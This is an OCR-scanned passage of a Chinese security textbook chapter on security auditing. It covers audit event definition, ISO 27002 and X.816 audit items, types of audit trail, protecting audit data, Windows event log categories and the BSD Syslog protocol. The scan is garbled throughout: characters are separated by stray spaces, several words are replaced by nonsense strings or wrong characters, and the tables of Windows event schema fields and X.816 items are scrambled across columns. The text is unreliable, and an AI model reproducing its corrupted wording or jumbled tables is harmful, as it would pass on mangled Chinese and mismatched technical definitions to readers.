回顾 图 18-1 和 图 18-3 所 显示 的 功能 ， 可 以 形成 进行 安全 审计 的 需求 集合 。 第 一 个 需求 是 
SEM (event definition)。 安 全 管理 员 必 须 定 义 需要 审计 的 事件 集 。 下 一 节 会 详细 讨论 这 个 
问题 。 这 里 给 出 一 个 由 [CCPS12a] 提供 的 列表 : 

© 将 与 安全 相关 的 软件 部 分 内 的 对 象 引 入 主体 的 地 址 空间 。 

© 对 象 的 删除 。 

e 访问 权限 或 功能 的 分 发 或 撤销 。 

e 主体 或 对 象 安 全 属性 的 改变 。 

e 安全 软件 根据 主体 请 求 执行 的 策略 检查 。 

e 使 用 访问 权限 绕 过 策略 检查 。 

e 识别 和 身份 认证 功能 的 使 用 。 

e 由 一 个 操作 员 或 授权 用 户 采 取 的 与 安全 相关 的 动作 (例如 ， 一 个 保护 机 制 的 禁用 )。 

e 可 移动 介质 (例如 ， 打 印 输出 、 磁 带 、 磁 盘 ) 数据 的 导入 和 导出 。 

第 二 个 需求 是 ， 在 应 用 程序 和 系统 软件 中 必须 要 有 适当 且 可 用 的 钩子 (hook)， 以 激活 事 
件 检测 (event detection ) 。 需 要 将 监控 软件 添加 到 系统 并 且 安 置 在 适当 的 位 置 ， 以 捕获 相关 的 
活动 。 

下 一 步 的 需求 是 事件 记录 (event recording) 的 功能 ， 其 中 包括 需要 提供 安全 的 存储 ， 以 防 
止 算 改 或 删除 。 利 用 事件 和 审计 迹 分 析 软 件 、 工 具 和 接口 处 理 所 收 集 到 的 数据 。 

另外 一 个 需求 是 审计 功能 的 安全 性 ( security of the auditing function )。 不 仅 是 审计 迹 ， 所 
有 审计 软件 和 中 介 存 储 都 必须 受到 保护 ， 使 之 不 会 被 绕 过 或 被 和 贷 改 。 最 后 ， 审 计 系统 应 具有 功 
能 影响 最 小 化 (minimal effect on functionality) 的 能 力 。 
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18.1.4 实施 指南 


ISOS27002 (信息 安全 管理 实施 细则 ，2013 年 10 月 ) 为 审计 功能 的 实现 提供 了 一 组 有 
用 的 指导 原则 : 

1. 对 访问 系统 和 数据 的 审计 需要 应 该 与 适当 的 管理 保持 一 致 。 

2. 技术 审计 测试 的 范围 应 该 被 允许 并 加 以 控制 。 

3. 审计 测试 应 该 被 限制 为 对 软件 和 数据 的 只 读 访 问 。 

4. 访问 只 读 权 限 之 外 的 系统 文件 ， 应 该 只 被 允许 访问 其 被 隔离 的 系统 文件 副本 ， 审 计 完 成 
时 副本 应 被 删除 ， 如 果 审 计 文 档 编 制 需 要 保留 这 些 文件 ， 那 就 要 对 其 进行 适当 的 保护 。 

5. 特殊 或 额外 的 处 理 需 求 应 被 标识 并 被 认可 。 

6. 可 能 影响 系统 可 用 性 的 审计 测试 应 该 在 工作 时 间 之 外 进行 。 

7. 所 有 访问 都 应 该 被 监视 和 记录 ， 以 产生 一 个 参考 路 径 。 


18.2 ”安全 审计 迹 
审计 迹 维护 着 系统 活动 的 记录 。 这 一 节 我 们 讨论 与 审计 迹 相关 的 问题 。 


18.2.1 所 收集 数据 的 类 型 


收集 数据 的 选择 是 由 大 量 的 需求 决定 的 。 一 个 问题 是 要 收集 的 数据 量 ， 这 要 由 相关 区 域 的 
范围 和 数据 集 的 粒度 确定 。 此 外 ， 数 量 和 效率 之 间 有 一 个 权衡 。 收 集 的 数据 越 多 ， 系 统 性 能 就 
下 降 越 多 。 过 多 的 数据 也 可 能 会 对 用 于 检查 和 分 析 数 据 的 各 种 算法 造成 不 必要 的 负担 。 此 外 ， 
这 些 数据 的 存在 会 导致 安全 报告 的 内 容 过 多 或 页 数 过 长 。 

考虑 到 这 些 注意 事项 ， 商 业 安 全 审计 迹 设计 的 第 一 步 是 选择 要 捕获 的 数据 项 。 其 中 包括 : 

e 与 审计 软件 的 使 用 相关 的 事件 ( 即 图 18-1 中 的 所 有 组 件 )。 

e 系统 上 与 安全 机 制 相关 的 事件 。 

© 为 各 种 安全 检测 和 防护 机 制 收集 的 所 有 事件 ， 其 中 包括 与 人 侵 检测 相关 的 项 目 和 与 防 

火 墙 操作 相关 的 项 目 。 

e 与 系统 管理 和 操作 相关 的 事件 。 

e 操作 系统 访问 (例如 ， 通 过 诸如 表 8-2 所 列 出 的 系统 调用 )。 

e 对 选 定 应 用 程序 的 访问 。 

e fE, 

在 表 18-2 中 显示 的 一 个 实例 是 X.816 中 建议 的 审计 项 目的 列表 。 这 个 标准 指出 正常 和 
异常 条 件 都 需要 被 审计 ， 例 如 每 个 连接 请 求 ， 如 TCP 连接 请 求 ， 它 可 能 是 安全 审计 迹 记 录 
的 一 个 主体 ， 无 论 请 求 是 否 异 常 ， 也 不 管 请 求 是 否 被 接受 ， 都 要 接受 审计 。 这 是 很 重要 的 一 
点 。 审 计数 据 的 收集 超出 了 生成 安全 报警 或 为 防火 墙 模 块 提供 输入 的 要 求 。 表 示 不 触发 报警 
的 行为 的 数据 可 用 于 识别 正常 和 异常 使 用 模式 ， 并 因此 作为 人 侵 检测 分 析 的 输入 。 而 且 , 在 
攻击 事件 中 ， 对 系统 上 所 有 活动 的 分 析 可 能 是 诊断 攻击 需要 的 ， 也 可 能 是 为 将 来 取得 合适 的 
对 策 所 需要 的 。 

另 一 个 对 可 审计 事件 有 用 的 列表 是 包含 在 ISO 27002 中 的 列表 ( 见 表 18-3), 5 X.816 — 
FE, ISO 标准 详细 讲述 了 授权 和 未 经 授权 的 事件 ， 以 及 会 影响 系统 安全 功能 的 事件 。 


日 ”国际 标准 化 组 织 。 请 参阅 附录 C 中 有 关 该 组 织 和 其 他 标准 制定 组 织 以 及 NIST 和 ISO 文档 列表 的 讨论 。 
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表 18-2 在 X.816 中 建议 的 审计 项 目 


与 特定 连接 相关 的 安全 事件 在 单独 的 安全 服务 方面 ， 下 面 与 安全 相关 的 事件 非常 重要 : 
。 连接 请 求 © 身份 认证 : 验证 成 功 
© 连接 确认 © 身份 认证 : 验证 失败 
© 断 开 连接 请 求 。 访问 控制 : 决定 访问 成 功 
© TFT iA 。 访问 控制 : 决定 访问 失败 
。 连接 的 统计 附属 信息 © 不 可 否认 性 : 不 可 否认 的 消息 的 原始 位 置 
与 安全 服务 的 使 用 相关 的 安全 事件 。 不 可 否认 性 : 不 可 否认 的 消息 的 收据 
。 安全 服务 请 求 。 不 可 否认 性 : 失败 的 事件 抵赖 
。 安全 机 制 使 用 © 不 可 否认 性 : 成 功 的 事件 抵赖 
。 安全 报警 。 完整 性 : 盾牌 (shield) 的 使 用 
与 管理 有 关 的 安全 事件 。 完整 性 : 无 盾牌 的 使 用 
。 管理 操作 。 完整 性 : 验证 成 功 
。 管理 通知 。 完整 性 : 验证 失败 
应 至 少 包括 的 审计 事件 列表 。 机密 性 ; 隐藏 的 使 用 
。 拒绝 访问 。 机 密 性 : 显示 的 使 用 
。 身份 验证 。 审计 : 选择 进行 审计 的 事件 
。 更改 属性 。 it: 取消 所 选 事件 的 审计 
。 创建 对 象 。 审计 : 更 改 审计 事件 的 选择 标准 
© 删除 对 象 
© 修改 对 象 
。 使 用 特权 
表 18-3 1SO 27002 中 建议 的 监控 区 域 
a) 用 户 ID 
b) 系统 活动 


c) 关键 事件 的 日 期 和 时 间 ， 例 如 ， 登 录 和 注销 

d) 设备 标识 或 位 置 (如 果 可 能 ) 和 系统 标识 符 

e) 成 功 的 和 被 拒绝 的 系统 访问 尝试 的 记录 

f) 成 功 的 和 被 拒绝 的 数据 和 其 他 资源 访问 尝试 的 记录 
g) 对 系统 配置 的 更 改 

h) 特权 的 使 用 

i) 系统 实用 程序 和 应 用 程序 的 使 用 

j) 文件 访问 和 访问 的 类 型 

k) 网 络 地 址 和 协议 

1) 访问 控制 系统 发 出 的 警报 

m) 启动 和 解除 保护 系统 ， 例 如 反 病 毒 系统 和 人 侵 探测 系统 
n) 用 户 在 应 用 程序 中 执行 的 事务 记录 


由 于 安全 管理 员 需 要 设计 审计 数据 的 收集 策略 ， 为 了 选择 要 收集 的 数据 项 ， 将 审计 迹 进 行 
分 类 是 非常 有 用 的 。 在 下 文中 ， 我 们 将 介绍 对 审计 迹 设 计 有 用 的 分 类 。 

系统 级 审计 迹 ”系统 级 审计 迹 通 常用 于 监控 和 优化 系统 性 能 ， 但 也 可 以 提供 安全 审计 功 
能 。 系 统 加 强 了 安全 策略 的 某 些 方面 ， 例 如 访问 系统 本 身 。 系 统 级 审计 迹 应 捕获 相关 数据 ， 如 
成 功 和 失败 的 登录 尝试 、 使 用 的 设备 和 执行 的 操作 系统 功能 。 其 他 系统 级 功能 也 可 能 是 审计 感 
兴趣 的 ， 如 系统 操作 和 网 络 性 能 指示 遂 。 

源 自 NIST SP 800-12 (计算 机 安全 入 门 : NIST 手 册 ，1995 年 10 H) 的 图 18-4a 是 UNIX 
系统 上 系统 级 审计 迹 的 一 个 实例 。shut down 命令 终止 所 有 进程 并 使 系统 采用 单 用 户 模式 。Su 
命令 创建 一 个 UNIX shell。 

应 用 级 审计 迹 ”应 用 级 审计 迹 可 以 用 于 检测 应 用 程序 内 部 的 安全 违规 ， 或 检测 应 用 程序 
与 系统 交互 的 缺陷 。 对 于 关键 的 应 用 或 与 敏感 数据 有 关 的 应 用 ， 应 用 级 审计 迹 可 以 提供 所 需 级 
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别 的 细节 来 评 佑 安全 威胁 及 其 影响 。 例 如 ， 对 于 电子 邮件 应 用 ， 审 计 迹 可 以 记录 发 件 人 和 收 件 
人 、 邮 件 大 小 和 附件 的 类 型 。 < ( 即 SQL) 进行 的 数据 库 交 互 审计 迹 可 
以 记录 用 户 、 事 务 类 型 ， 甚 至 单个 表 、 行 、 列 的 类 型 ， 或 者 访问 的 数据 项 。 

图 18-4b 是 一 个 邮件 投递 系统 的 应 TREPERE, 





c) 显示 用 户 执行 命令 顺序 列表 的 用 户 日 志 
图 18-4 审计 迹 实 例 


用 户 级 审计 迹 ”用 户 级 别 的 审计 迹 依据 时 间 顺 序 记录 单个 用 户 的 活动 。 它 可 用 于 指出 用 户 
对 自己 动作 所 负 的 责任 。 这 样 的 审计 迹 ， 作 为 试图 定义 相对 于 异常 的 正常 行为 分 析 程 序 的 输入 
也 是 有 用 的 。 
一 个 用 户 级 审计 迹 可 以 记录 用 户 与 系统 的 交互 ， 如 发 出 的 命令 、 尝 试 的 用 户 识 别 和 认证 的 
次 数 、 访 问 的 文件 和 资源 。 审 计 迹 也 可 以 捕获 用 户 对 应 用 程序 的 使 用 信息 。 
图 18-4c 是 一 个 在 UNIX 系统 上 的 用 户 级 审计 迹 实例 。 
物理 访问 审计 迹 ”物理 访问 审计 迹 可 以 由 控制 物理 访问 的 设备 生成 ， 然 后 传送 到 一 个 中 央 
主机 以 供 后 续 的 存储 和 分 析 。 实 例 有 电子 钥匙 (card-key) 系统 和 报警 系统 。NIST SP 800-12 列 
出 以 下 相关 数据 类 型 的 实例 : 
e 应 记录 尝试 访问 的 日 期 和 时 间 ， 也 要 记录 尝试 或 进行 访问 所 经 过 的 门 ( gate or door) 和 
个 人 用 户 (或 用 户 ID)。 
e 无 效 尝试 应 通过 非 计 算 机 的 审计 迹 进 行 监控 和 记录 ， 就 像 它 们 是 计算 机 系统 审计 迹 一 
样 。 管 理应 该 注意 是 否 有 人 在 未 经 授权 的 时 间 内 试图 进行 访问 。 
e 记录 的 信息 还 应 包括 试图 添加 、 修 改 或 删除 的 物理 访问 权限 〈 例 如， 授权 一 个 新 雇员 
进入 该 建筑 物 或 授权 换 岗 的 职员 进入 他 们 的 新 办 公 室 ， 并 且 如 果 可 行 的 话 ， 当 然 要 删 
除 他 们 的 旧 访 问 权 限 )。 
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© 与 系统 和 应 用 程序 审计 迹 一 样 ， 非 计算 机 的 审计 功能 可 以 实现 将 消息 发 送 给 安全 管理 
人 人员， 指明 对 受 控 制 的 空间 有 效 或 无 效 的 访问 尝试 。 为 了 不 降低 监控 器 的 敏感 性 ， 所 
有 访问 都 不 应 以 消息 的 形式 发 送 到 显示 屏 。 如 果 发 生 例 外 情况 ， 如 失败 的 访问 尝试 ， 
在 监控 访问 中 应 被 突出 显示 。 


18.2.2 保护 审计 迹 数 据 


RFC 2196 (网 站 安全 手册 ，1997 年 ) 列 出 了 用 于 存储 审计 迹 的 三 种 备 选 方案 : 

e 在 主机 上 读 / 写 文件 。 

© 一 次 写 入 /多 次 读 取 设备 (例如 ，CD-ROM 或 DVD-ROM). 

e 只 写 的 设备 (例如 ， 一 个 行 式 打 印 机 )。 

文件 系统 日 志文 件 是 比较 容易 配置 的 ， 且 占用 的 资源 最 少 。 记 录 可 以 立即 被 访问 ， 这 对 对 
抗 正 在 进行 的 攻击 非常 有 有 用。 但是， 这 种 方法 特别 容易 受到 攻击 。 如 果 攻 击 者 获得 对 系统 的 访 
问 特权 ， 则 审计 迹 很 容易 被 修改 或 被 删除 。 

DVD-ROM 或 类 似 的 存储 方法 更 安全 ， 但 不 太 方便 。 该 方法 需要 一 个 稳定 的 可 写 人 的 介 
质 。 访 问 可 能 会 被 延迟 且 不 可 立即 使 用 。 

打印 的 日 志 提供 纸 制 的 审计 迹 ， 但 无 法 在 大 的 系统 或 网 络 系统 上 实际 应 用 于 捕获 详细 的 审 
计数 据 。RFC 2196 建议 ， 当 需要 永久 的 、 立 即 可 用 的 日 志 时 ， 即 使 系统 崩溃 ， 纸 质 日 志 也 是 
非常 有 用 的 。 

审计 迹 的 保护 同时 涉及 完整 性 和 机 密 性 。 完 整 性 特别 重要 ， 因 为 人 侵 者 可 能 试图 通过 更 
改 审 计 迹 而 删除 入侵 证 据 。 对 于 文件 系统 日 志 ， 可 能 的 确保 完整 性 的 最 佳 方法 是 数字 签名 。 一 
KEARE., W DVD-ROM 或 纸张 自动 提供 完整 性 。 加 强 的 访问 控制 是 另 一 个 提供 完整 性 的 
方法 。 

如 果 审 计 迹 包含 用 户 信息 则 机 密 性 非常 重要 ， 这 些 信息 很 敏感 并 且 不 能 透露 给 所 有 用 户 ， 
如 有 关 工 资 改动 或 工资 等 级 状况 的 信息 。 在 这 方面 加 强 访问 控制 能 起 到 帮助 作用 。 一 种 有 效 的 
措施 是 对 称 加 密 (例如 ,使 用 AES (高 级 加 密 标准 ) 或 三 重 DES (数据 加 密 标准 ))。 必 须 保 护 
好 密 钥 ， 仅 可 供 审 计 迹 软件 和 后 续 审 计 分 析 软 件 使 用 。 

注意 ， 完 整 性 和 机 密 性 措施 不 仅 保 护 本 地 存储 的 审计 迹 数据 ， 而 且 还 保护 向 中 央 存 储 库 传 
输 过 程 中 的 审计 迹 数 据 。 


18.3 ”实现 日 志 功 能 


安全 审计 工具 的 基础 是 审计 数据 的 初始 捕获 。 这 要 求 该 软件 包括 钧 子 (hook) 或 者 捕获 
点 ， 一 旦 预先 选 定 的 事件 发 生 ， 则 触发 数据 的 收集 和 存储 。 这 样 的 审计 数据 收集 或 日 志 功 能 依 
赖 于 审计 软件 的 特性 ， 也 随 着 所 采用 的 操作 系统 及 所 涉及 的 应 用 程序 而 变化 。 本 节 我 们 考察 系 
统 级 和 用 户 级 审计 迹 日 志 功 能 的 实现 方法 ; 同时 ,我 们 也 考察 应 用 程序 级 审计 迹 的 日 志 功 能 的 
实现 方法 。 


18.3.1 系统 级 日 志 功 能 


系统 级 的 大 部 分 日 志 功 能 可 以 使 用 作为 操作 系统 的 一 部 分 的 现 有 工具 实现 。 本 节 我 们 讨论 
Windows 操作 系统 中 的 工具 和 UNIX 操作 系统 中 的 系统 日 志 (Syslog) TA. 

Windows 事件 日 志 Windows 事件 日 志 中 的 事件 是 描述 计算 机 系统 中 发 生 的 引 人 注 意 的 
事件 的 实体 。 事 件 包含 一 个 数字 标识 码 、 一 组 属性 (任务 、 操 作 码 、 级 别 、 版 本 和 关键 字 )， 
以 及 用 户 提 供 的 可 选 数据 。Windows 配 有 三 种 类 型 的 事件 日 志 : 


e 系统 事件 日 志 ( system event log): 该 工具 是 由 系统 服务 账户 (已 安装 系统 服务 ) 下 
运行 的 应 用 程序 、 驱 动 程序 或 者 与 计算 机 系统 运行 状况 相关 的 应 用 程序 或 组 件 来 使 
用 的 。 

e 应 用 程序 事件 日 志 (application event log): 
不 受 保护 并 对 任何 应 用 程序 开放 。 
日 志 。 

e 安全 事件 日 志 (security event log): 即 Windows 审计 日 志 。 此 事件 日 志 是 Windows 本 
地 安全 授权 ( Windows Local Security Authority) 独占 使 用 的 。 如 果 基 础 应 用 程序 支持 ， 
用 户 事件 可 以 作为 审计 对 象 。 

对 所 有 事件 日 志 或 审计 迹 ， 事 件 的 信息 可 以 以 XML 格式 存储 。 表 18-4 列 出 每 个 事件 信息 


记录 所 有 用 户 级 应 用 程序 的 事件 。 此 日 志 
记录 扩展 信息 的 应 用 程序 应 该 定义 一 个 特殊 应 用 的 


的 存储 项 。 图 18-5 是 从 一 个 Windows 系统 事件 日 志 中 导出 的 数据 的 一 个 实例 。 


表 18-4 Windows 事件 架构 组 件 


LevelName WPP 的 调试 跟踪 字段 ， 在 调试 通道 (debug 


包含 二 进 制 数据 的 事件 的 属性 值 channel) 的 调试 事件 中 使 用 


Windows 事件 日 志 提供 的 二 进 制 数据 一 个 事件 被 呈报 的 级 别 

呈报 事件 被 发 布 的 通道 事件 的 严重 级 别 

事件 提供 器 为 一 个 参数 提供 的 复杂 数据 ee OPS AEA 
调试 事件 中 使 用 的 ComponentName WPP 调试 跟踪 字段 事件 呈报 的 事件 消息 

事件 发 生 所 在 的 计算 机 事件 所 呈报 的 操作 码 

两 个 128 位 值 ， 可 用 于 查找 相关 的 事件 活动 或 活动 的 点 ， 它 在 引发 该 事件 时 执行 该 应 用 程序 
事件 数据 被 处 理 时 导致 了 错误 的 事件 数据 项 的 名 称 。 | ”定义 自动 化 事件 的 组 件 


由 事件 提供 器 提供 的 复杂 数据 类 型 的 一 部 分 所 构成 的 
数据 

事件 提供 器 为 一 个 参数 提供 的 数据 

Windows 软件 跟踪 预 处 理 器 (WPP) 事件 的 属性 值 

在 处 理事 件数 据 出 错时 引发 的 错误 码 


描述 系统 中 发 生 的 一 些 有 趣事 件 信息 的 结构 化 片断 


事件 标识 号 


有 关 事 件 发 生 的 进程 和 线程 的 信息 


事件 数据 被 处 理 时 导致 的 错误 事件 的 二 进 制 事件 数据 
有 关 事 件 发 生 的 进程 和 线程 的 信息 


FileLine WPP 调试 跟踪 字段 ， 在 调试 通道 的 调试 事件 


中 使 用 


FlagsName WPP 调试 跟踪 字段 ， 在 调试 通道 的 调试 事 


件 中 使 用 


有 关 发 布 该 事件 的 事件 提供 器 的 信息 


发 布 被 呈报 事件 的 事件 发 布 者 

一 个 事件 被 呈报 的 信息 

用 户 安全 标识 符 

SequenceNum WPP 调试 跟踪 字段 ， 在 调试 通道 的 调试 


事件 中 使 用 


SubComponentName WPP 调试 跟踪 字段 ， 在 调试 通道 


的 调试 事件 中 使 用 


当 该 事件 被 引发 或 被 保存 到 日 志文 件 时 ， 由 系统 目 动 


填充 的 信息 


一 个 事件 将 显示 的 任务 
使 用 符号 值 的 任务 


事件 发 生 时 间 的 有 关 信息 


提供 者 定义 的 部 分 ， 可 以 包含 任何 有 效 的 传递 事件 信 


息 的 XML 内 容 
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(ZE) 
KernelTime WPP 调试 跟踪 字段 ， 在 调试 通道 的 调试 事 UserTime WPP 调试 跟踪 字段 ， 在 调试 通道 的 调试 事件 
件 中 使 用 中 使 用 
显示 给 事件 的 关键 字 事件 版 本 
事件 使 用 的 关键 字 





图 18-5 Windows 系统 日 志 项 实例 


Windows 允许 系统 用 户 在 9 个 不 同 的 活动 类 别 中 启用 审计 功能 : 

e 账户 登录 事件 ( account logon event): 从 系统 的 角度 看 ， 用 户 身 份 认证 活动 可 以 对 尝试 
的 登录 进行 验证 。 实 例 : 认证 授权 ; 认证 票据 请 求 失 败 ; 登录 时 的 账户 映射 ; 登录 时 
账户 无 法 映射 。 此 类 别 中 的 个 体 活动 是 不 需要 特别 说 明 的 ,但 大 量 的 失败 可 能 表明 有 
扫描 活动 、 蛮 力 攻击 单个 账户 活动 ， 或 者 自动 攻击 传播 活动 。 

e 账户 管理 (account management): 与 创建 、 管 理 、 删 除 单个 账户 和 用 户 组 有 关 的 管理 活 
动 。 实 例 : 创建 用 户 账户 ; 尝试 更 改 密码 ; 删除 用 户 账户 ; 启用 安全 的 全 局 组 成 员 添 加 ; 
域 策略 更 改 。 

e 目录 服务 访问 (directory service access): 对 任何 活动 目录 对 象 的 用 户 级 访问 ， 这 个 对 象 
具有 定义 的 系统 访问 控制 列表 (SACL). 一 个 SACL 创建 一 组 需要 进行 细 粒 度 审计 的 
用 户 和 用 户 组 。 

o 登录 事件 (logon event): 不 管 是 本 地 计算 机 还 是 网 络 ， 从 发 出 该 活动 的 系统 进行 的 用 
户 认证 活动 。 实 例 : 用 户 成 功 登 录 ; 因 未 知 的 用 户 名 或 错误 口令 而 登录 失败 ; 因 上 账户 
被 禁用 而 登录 失败 ; 因 账 户 已 过 期 而 登录 失败 ; 因 用 户 不 允许 登录 此 计算 机 而 登录 失 
败 ; 用 户 注 销 ; 登录 失败 ， 账 户 锁定 。 

e 对 象 访问 (object access): 对 拥有 已 定义 的 系统 访问 控制 列表 的 文件 系统 和 注册 表 对 象 
的 用 户 级 访问 。 对 象 访 问 提供 了 一 种 相对 容易 的 方法 来 跟踪 与 操作 系统 集成 在 一 起 的 
敏感 文件 的 读 取 访 问 和 更 改 。 实 例 : 对 象 打 开 ; 对 象 删除 。 

e REEK (policy change): 对 访问 策略 、 审 计 配 置 和 其 他 系统 级 设置 的 管理 进行 变更 。 
实例 : 用 户 权限 分 配 ; 新 的 可 信 域 增加 ; 审计 策略 更 改 。 

© 特权 使 用 (privilege use): Windows 合并 了 用 户 权 限 与 细 粒 度 地 执行 特定 任务 的 权限 的 
概念 。 如 果 你 启用 特权 使 用 审计 ， 你 将 记录 用 户 行使 其 访问 特定 的 系统 功能 (创建 对 
象 、 调 试 可 执行 代码 或 备份 系统 ) 的 所 有 实例 。 实 例 : 指定 的 权限 已 添加 到 用 户 的 访 
问 令 牌 (在 登录 中 ); 用 户 试 图 执行 特权 系统 服务 操作 。 

o 进程 跟踪 (process tracking): 当 进 程 启动 和 结束 ， 程 序 被 激活 或 对 象 被 间接 访问 时 生成 
的 详细 审计 人 信息。 实例: 创建 新 的 进程 ;进程 退出 ; 可 审计 数据 受到 保护 ; 可 审计 数 
据 不 受 保护 ; 用 户 试 图 安装 一 种 服务 。 
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e 系统 事件 (system event): 记录 影响 系统 的 完整 性 和 可 用 性 的 事件 信息 ， 包 括 局 动 消息 
和 系统 关机 消息 。 实 例 : 系统 正在 启动 ; Windows 正在 关闭 ; 日 志 子 系统 资源 耗 尽 ; 
某 些 审计 丢失 ; 清除 审计 日 志 。 

Syslog 这 是 在 所 有 的 UNIX 系列 和 Linux 上 配置 的 UNIX 通用 日 志 机 制 。 它 包括 以 下 
组 件 : 

è syslog() : 是 一 个 可 以 被 某 些 标准 系统 实用 工具 引用 的 应 用 程序 编程 接口 (API)， 同 时 

这 个 接口 对 于 应 用 程序 也 是 可 用 的 。 

e logger: 是 一 个 用 于 将 单行 的 记录 添加 到 Syslog 中 的 UNIX 命令 。 

e /etc/ syslog.conf: 用 于 控制 记录 和 安排 Syslog 事件 的 配置 文件 。 

e syslogd: 系统 守护 进程 ， 用 于 接收 和 管理 来 自 syslog() 调用 和 logger 命令 的 Syslog 

事件 。 

不 同 的 UNIX 实现 ， 其 Syslog 工具 将 会 有 不 同 的 变化 ， 并 且 在 系统 中 没有 统一 的 Syslog 
格式 。 我 们 将 在 第 25 章 研究 Linux Syslog 工具 。 此 外 ， 我 们 提供 一 些 Syslog 相关 功能 的 简要 
概述 ， 并 分 析 Syslog 协议 。 

UNIX Syslog 提供 的 基本 服务 是 : 一 种 用 于 捕获 相关 事件 的 工具 ; 一 种 存储 设备 ; 一 
于 传输 从 其 他 计算 机 到 作为 Syslog 服务 器 的 中 心计 算 机 系统 的 日 志 消息 的 协议 。 除 了 这 些 基 
本 的 功能 ， 还 有 其 他 可 用 的 服务 ， 这 些 服务 通常 是 第 三 方 软件 包 ， 某 些 情 形 下 是 系统 内 置 模 
块 。NIST SP 800-92 (计算 机 安全 日 志 管 理 指南 ，2006 年 9 月 ) 列 出 了 以 下 最 为 常用 的 一 些 额 
外 功能 : 

© 强力 过 滤 (robust filtering): 原始 Syslog 的 实现 仅 允 许 对 消息 基于 它们 的 实用 程序 和 优 

先 级 进行 不 同 的 处 理 ; 允许 不 进行 细 粒 度 的 筛选 。 目 前 某 些 Syslog 的 实现 提供 更 强力 
的 过 滤 功 能 ， 如 根据 不 同 的 主机 或 不 同 的 消息 产生 程序 ， 或 者 根据 不 同 的 用 于 匹配 消 
息 内 容 的 正则 表达 式 ， 以 不 同 的 方式 处 理 消 息 。 某 些 实现 还 允许 多 个 过 滤器 应 用 于 一 
个 消息 ， 提 供 更 复杂 的 过 滤 功 能 。 

e 日 志 分 析 (log analysis): 最 初 ，Syslog 服务 器 没有 执行 任何 日 志 数据 分 析 的 功能 ， 它 
们 只 是 为 记录 和 传输 日 志 的 数据 提供 了 框架 。 管 理 员 可 以 使 用 单独 的 附加 程序 来 分 析 
Syslog 数据 。 现 在 某 些 Syslog 已 经 实现 了 有 限 的 内 置 日 志 分 析 功 能 ， 如 关联 多 个 日 志 
记录 的 能 力 。 

e 事件 响应 (event response): 某 些 Syslog 的 实现 在 检测 到 某 些 事件 时 可 以 启动 一 些 动作 。 
动作 实例 包括 发 送 SNMP 陷阱 、 通 过 页 面 或 电子 邮件 向 管理 员 发 出 报警 ， 以 及 局 动 单独 
的 程序 或 脚本 。 也 可 以 创建 一 条 新 的 Syslog 消息 ， 以 此 表明 检测 到 一 个 特定 的 事件 。 
可 选 消息 格式 (alternative message format): 某 些 Syslog 的 实现 可 以 以 非 Syslog 的 格式 
接收 数据 ， 如 SNMP 陷阱 。 这 对 于 从 不 支持 Syslog 且 不 能 修改 的 主机 上 获取 安全 事件 
数据 很 有 帮助 。 
© 日 志文 件 加 密 (log file encryption): 某 些 Syslog 的 实现 可 以 配置 为 自动 旋转 加 密 日 志 

文件 来 保护 其 机 密 性 。 这 还 可 以 通过 使 用 操作 系统 或 第 三 方 加 密 程 序 完 成 。 
e 日 志 的 数据 库存 储 (database storage for log): 有 些 实现 可 以 将 日 志 记 录 存 储 在 传统 的 
Syslog 文件 和 数据 库 中 。 数 据 库 格式 的 日 志 记 录 对 进行 后 续 日 志 分 析 非 常 有 帮助 。 
速率 限制 (rate limiting): 有 些 实 现 可 以 限制 Syslog 消息 数量 以 及 在 特定 的 时 间 段 内 
从 特定 的 源 发 起 的 TCP 连接 数 。 这 对 于 保护 Syslog 服务 器 免 受 拒 绝 服务 攻击 ， 避 免 
来 目 其 他 源 的 Syslog 消息 丢失 很 有 用 。 因 为 这 项 技术 可 以 丢弃 来 目 著 意 淹没 Syslog 
服务 喜 的 某 个 源 的 消息 ， 但 在 不 良 事件 发 生 期 间 由 于 生成 大 量 消息 也 会 导致 一 些 日 
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志 数 据 丢 失 。 

Syslog 协议 提供 了 一 种 传输 方案 ， 以 便 计算 机 将 事件 通知 消息 通过 IP 网 络 发 送 到 事件 信 

息 收 集 器 一 一 也 称 为 Syslog 服务 器 。 在 系统 中 , 我 们 可 以 查看 捕获 和 记录 事件 的 过 程 : 各 种 
应 用 程序 和 系统 设备 将 消息 发 送 到 syslogd， 然 后 存储 在 Syslog 中 。 因 为 每 个 进程 、 应 用 程序 
和 UNIX 操作 系统 实现 ， 对 于 记录 的 事件 可 能 会 有 不 同 的 格式 设置 约定 ， 因 而 Syslog 协议 只 
为 系统 之 间 传 输 提供 通用 的 消息 格式 。Syslog 协议 的 一 个 常见 版 本 最 初 是 在 加 州 大 学 伯克利 
分 校 的 软件 发 行 版 (BSD) UNIX/TCP/ IP 系统 上 开发 的 。 此 版 本 已 记录 在 RFC 3164 中 ,， 即 BSD 
Syslog 协议 。 随 后 ，IETF 发 布 『 RFC 5424, El Syslog 协议 ( Syslog Protocol)， 该 协议 被 确定 为 
了 Internet 标准 ， 并 与 BSD 版 本 有 一 些 细节 上 的 差异 。 以 下 我 们 描述 的 是 BSD 版 本 。 

BSD Syslog 协议 的 消息 格式 由 下 面 三 部 分 组 成 : 

e PRI: 由 表示 消息 的 发 送 设 备 和 消息 的 严重 程度 值 的 代码 组 成 ， 随 后 将 对 这 些 代 码 进 行 
描述 。 

e+: 包含 时 间 惟 ， 以 及 主机 名 或 者 设备 的 IP 地 址 的 指示 信息 。 

e Msg: 由 两 个 字段 组 成 ,标签 (TAG) 域 是 生成 消息 的 程序 或 进程 的 名 称 ， 内 容 
(CONTENT) 字段 包含 消息 的 详细 信息 。Msg 部 分 传统 上 是 由 可 打印 字符 表示 的 任意 
形式 的 消息 ， 它 给 出 了 事件 的 详细 信息 。 

图 18-6 显示 了 Syslog 消息 的 几 个 实例 ， 其 中 没有 包括 PRI 部 分 。 
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118-6 Syslog 消息 实例 


发 送 给 Syslog 守护 进程 (syslogd) 的 所 有 消息 ， 都 包含 一 个 消息 的 发 送 设备 和 消息 严重 程 
度 值 ( 见 表 18-5 )。 发 送 设备 标识 了 生成 消息 的 应 用 程序 或 系统 组 件 。 严 重 程度 或 消息 级 别 ， 
指明 消息 的 相对 严重 级 别 并 可 用 于 某 些 尚 不 完善 的 筛选 。 


18.3.2 ”应 用 程序 级 日 志 功 能 


应 用 程序 ， 尤 其 是 具有 一 定 特权 级 别 的 应 用 程序 ， 存 在 的 安全 问题 可 能 不 能 被 系统 级 或 用 
户 级 审计 数据 捕获 。 应 用 程序 级 的 安全 漏洞 在 安全 邮件 列表 报告 的 漏洞 中 占 较 大 的 百分比 。 一 
